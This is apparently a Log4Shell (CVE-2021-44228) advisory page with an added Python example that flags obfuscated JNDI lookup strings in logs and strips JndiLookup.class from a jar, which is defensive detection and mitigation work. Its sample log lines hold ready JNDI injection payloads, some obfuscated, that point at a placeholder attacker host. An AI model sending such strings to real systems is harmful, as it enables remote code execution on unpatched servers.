Vulnerability found in the Java library Log4j could lead to a breach.
On December 9th, 2021, a vulnerability in the Log4j Java logging library was publicly disclosed, along with proof-of-concept exploit code. It has since been assigned the identifier CVE-2021-44228 and is nicknamed "Log4Shell".
The vulnerability affects unpatched Log4j 2 versions from 2.0-beta9 through 2.15.0 (the security releases 2.12.2, 2.12.3 and 2.3.1 excepted); the JNDI lookup functionality was removed entirely in 2.16.0. It is specific to log4j-core and does not affect log4net or log4cxx.
"Apache Log4j 2 JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints," nvd.nist.gov states.
According to nvd.nist.gov, an attacker who can control log messages or log message parameters can execute arbitrary code loaded from an LDAP server when message lookup substitution is enabled: any logged string of the form ${jndi:ldap://attacker-controlled-host/...} makes Log4j resolve the lookup and load the referenced object. In versions 2.10 and later, this can be mitigated by setting the system property log4j2.formatMsgNoLookups (or the environment variable LOG4J_FORMAT_MSG_NO_LOOKUPS) to true; in earlier versions, by removing the JndiLookup class from the classpath. Both are stopgaps: the fix is to upgrade to a release in which the JNDI lookup has been removed.
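The two practical checks that follow from the above are spotting lookup strings in logs before they reach a vulnerable Log4j, and confirming whether a jar still ships the JndiLookup class. The code below is an added example, not part of the original page or of the Log4j project. It emulates the small set of lookups attackers use to hide the word "jndi" (the ${key:-default} default-value syntax, ${lower:...} and ${upper:...}) so that obfuscated payloads normalise to ${jndi:...}, and it rewrites a jar without org/apache/logging/log4j/core/lookup/JndiLookup.class, which is what the Apache-recommended command `zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class` does in place. The log lines, hostnames and the jar are constructed here for illustration.

```python
"""Added example (not from the original page or the Log4j project):
(1) normalise Log4j-style lookup obfuscation in log lines and flag ${jndi:...}
lookups; (2) check a jar for JndiLookup.class and produce a copy without it.
Sample log lines and the jar are constructed; hostnames are placeholders."""
import io
import re
import zipfile
from typing import List

# Innermost ${...} containing no further $, { or }.
_INNER = re.compile(r"\$\{([^${}]*)\}")
_JNDI = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)
JNDI_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"


def _resolve(expr: str) -> str:
    """Emulate the lookups commonly used to hide 'jndi'. Anything we do not
    emulate (jndi itself, date, sys, ...) is kept, wrapped in private markers
    so the substitution loop terminates instead of re-matching it."""
    if expr.lower().lstrip().startswith("jndi:"):
        return "\x01" + expr + "\x02"
    body, sep, default = expr.partition(":-")
    if sep:                                  # ${unresolvable:-default} -> default
        return default
    prefix, sep, value = expr.partition(":")
    if sep and prefix.lower() == "lower":    # ${lower:J} -> j
        return value.lower()
    if sep and prefix.lower() == "upper":    # ${upper:n} -> N
        return value.upper()
    return "\x01" + expr + "\x02"


def normalize_lookups(line: str) -> str:
    """Resolve innermost lookups until nothing changes, then restore the
    lookups we deliberately left unresolved."""
    prev = None
    while prev != line:
        prev, line = line, _INNER.sub(lambda m: _resolve(m.group(1)), line)
    return line.replace("\x01", "${").replace("\x02", "}")


def is_log4shell_probe(line: str) -> bool:
    """True if the de-obfuscated line contains a ${jndi:...} lookup."""
    return _JNDI.search(normalize_lookups(line)) is not None


def find_probes(lines: List[str]) -> List[str]:
    return [line for line in lines if is_log4shell_probe(line)]


def jar_entries(jar_bytes: bytes) -> List[str]:
    with zipfile.ZipFile(io.BytesIO(jar_bytes)) as zf:
        return zf.namelist()


def jar_has_jndilookup(jar_bytes: bytes) -> bool:
    return JNDI_CLASS in jar_entries(jar_bytes)


def strip_jndilookup(jar_bytes: bytes) -> bytes:
    """Copy of the jar with JndiLookup.class omitted (the class-removal
    mitigation for Log4j releases before 2.10)."""
    out = io.BytesIO()
    with zipfile.ZipFile(io.BytesIO(jar_bytes)) as src, \
            zipfile.ZipFile(out, "w") as dst:
        for info in src.infolist():
            if info.filename != JNDI_CLASS:
                dst.writestr(info, src.read(info.filename))
    return out.getvalue()


def build_fake_jar() -> bytes:
    """Constructed stand-in for a vulnerable log4j-core jar; the class files
    are placeholder bytes, not real bytecode."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("META-INF/MANIFEST.MF", "Manifest-Version: 1.0\n")
        zf.writestr(JNDI_CLASS, b"\xca\xfe\xba\xbe placeholder")
        zf.writestr("org/apache/logging/log4j/core/lookup/DateLookup.class",
                    b"\xca\xfe\xba\xbe placeholder")
    return buf.getvalue()


SAMPLE_LINES = [  # constructed access-log lines; attacker.example is a placeholder
    '10.0.0.5 - - "GET /index.html HTTP/1.1" 200 "Mozilla/5.0"',
    '10.0.0.9 - - "GET / HTTP/1.1" 200 "${jndi:ldap://attacker.example/a}"',
    '10.0.0.9 - - "GET / HTTP/1.1" 200 "${${lower:j}ndi:ldap://attacker.example/a}"',
    '10.0.0.9 - - "GET / HTTP/1.1" 200 "${${::-j}${::-n}${::-d}${::-i}:rmi://attacker.example/a}"',
    '10.0.0.9 - - "GET / HTTP/1.1" 200 "${${env:NOPE:-j}ndi:${lower:LDAP}://attacker.example/a}"',
    '10.0.0.7 - - "GET /?d=${date:yyyy} HTTP/1.1" 200 "curl/7.0"',
]

if __name__ == "__main__":
    for hit in find_probes(SAMPLE_LINES):
        print("ALERT:", hit)
    jar = build_fake_jar()
    print("JndiLookup present:", jar_has_jndilookup(jar),
          "-> after strip:", jar_has_jndilookup(strip_jndilookup(jar)))
```

The normaliser only emulates the handful of lookups needed for the common obfuscations; a payload built from lookups it does not resolve (for example a real ${env:...} or ${sys:...} value supplying a letter) would slip past it, and a benign line containing ${date:yyyy} is correctly left alone. Treat the detector as a triage filter, and the jar check as a way to confirm the mitigation landed, not as a substitute for upgrading.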
Detection of Log4Shell (CVE-2021-44228) using QRadar (ibm.com)
An update on the Apache Log4j CVE-2021-44228 vulnerability - IBM PSIRT Blog
Log4j2 Vulnerability: How to Mitigate CVE-2021-44228 | CrowdStrike
Companies Respond to Log4Shell Vulnerability as Attacks Rise | SecurityWeek.Com
The Log4j security flaw could impact the entire internet. Here's what you should know - CNN
"Log4Shell": The Latest News, Updates, & Prevention Tips | CrowdStrike